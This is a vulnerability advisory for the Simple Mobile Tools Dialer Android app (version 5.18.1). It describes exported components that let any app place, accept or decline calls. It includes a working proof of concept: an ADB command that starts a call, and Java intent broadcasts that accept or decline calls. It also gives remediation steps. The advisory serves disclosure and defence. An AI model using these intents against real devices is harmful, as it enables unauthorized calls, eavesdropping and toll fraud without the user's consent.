A severe security vulnerability has been identified in the com.simplemobiletools.dialer
Android application. The app's DialerActivity
and CallActionReceiver
can be externally manipulated to initiate and control calls without user interaction or consent.
- Name: com.simplemobiletools.dialer
- Version: Version 5.18.1
The application's DialerActivity
and CallActionReceiver
are improperly exposed to external intent calls, allowing any application to initiate, accept, or decline phone calls.
- Unauthorized Call Initiation and Control: Potential for an external entity to initiate and control phone calls, leading to privacy breaches and unauthorized usage of telephony services.
The vulnerability can be demonstrated using the following ADB command:
adb shell am start -a android.intent.action.CALL -d tel:8008000000 -n com.simplemobiletools.dialer/.activities.DialerActivity
// Java PoC to Accept a Call
Intent acceptCallIntent = new Intent("com.simplemobiletools.dialer.action.ACCEPT_CALL");
context.sendBroadcast(acceptCallIntent);
// Java PoC to Decline a Call
Intent declineCallIntent = new Intent("com.simplemobiletools.dialer.action.DECLINE_CALL");
context.sendBroadcast(declineCallIntent);
- Restrict Intent Exposure: Ensure that
DialerActivity
andCallActionReceiver
only respond to intents from trusted sources. - Implement User Consent: Enforce explicit user consent for sensitive actions like call handling.
- Security Audit: Conduct a thorough review of the application to identify and address any security vulnerabilities.
- Update Manifest: Revisit the app's manifest to tighten the exposure of activities and receivers.
The identified vulnerability represents a significant risk to user privacy and security. Prompt action is recommended to address these issues and safeguard the application's users.